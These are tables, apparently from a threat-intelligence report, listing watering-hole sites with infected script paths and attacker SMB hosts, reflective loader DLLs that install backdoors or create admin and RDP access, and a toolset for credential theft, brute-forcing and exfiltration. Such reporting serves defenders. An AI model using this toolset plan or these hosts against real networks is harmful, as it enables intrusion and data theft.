Table 1. Watering hole website details TLD Region Vertical Infected JavaScript SMB URL gov.lb Lebanon Intelligence Agency /assets/js/front/jquery.min.js 51.254.173.240/file.gif org.sa Saudi Arabia Healthcare /JavaScript/CommonJScript.js adobe-plugin.bid/file.gif edu.az Azerbaijan University /_layouts/1033/init.js 188.165.187.235/file.gif Table 2. Reflective loader DLLs File name PDB string Purpose dnf2.x86.dll …\Desktop\DLL\rat\code\dnf2\32\… Drops & installs Backdoor.Sorgu dnf2.x64.dll dnf4.x86.dll …\Desktop\DLL\rat\code\dnf4\32\… dnf4.x64.dll guester.x86.dll …\Desktop\NSA\Payloads\guestsaz\32\… Drops & installs Trojan.Imecab guester.x64.dll remote.x86.dll …\Desktop\NSA\Payloads\DLL\code\32\… Enables the Windows "Remote Desktop Protocol" service (RDP) remote.x64.dll …\Desktop\NSA\Payloads\DLL\code\32\x64\Release\… adm.add.x86.dll …\Desktop\DLL\code\32\Release\… Creates/activates an admin user with a hardcoded password adm.add.x64.dll …\Desktop\shellcode\x64\Release\… vmware.x86.dll …\Desktop\ReflectiveDLLInjection-master\… Creates an admin user for Remote Desktop Protocol access vmware.x64.dll …\Desktop\shellcode\x64\Release\… Table 3. Toolset for lateral movement, information gathering, and exfiltration Software Purpose Description Customized Obfuscated MSF Rotten Potato Local Privilege escalation X Mimikatz/OrangeTeghal Lateral Login/password retrieval X X LaZagne Lateral Login/password retrieval THC Hydra Lateral Dictionary attacks against logins of network services Sysinternals PsExec Lateral Launch remote processes Total SMB BruteForcer Lateral Brute-force SMB logins X Sysinternals PsInfo Info Get detailed information about remote systems Router Scan v2.47 Info Scan for wireless networks MailSniper Exfiltration Search Exchange server mailboxes for keywords Sobolsoft Extract Attachments Exfiltration Extract attachments from EML email files SysTools SQL Backup Recovery Exfiltration Export backup of MSSQL databases HoboCopy Exfiltration Disk backup Voidtools Everything Exfiltration Desktop file indexing & search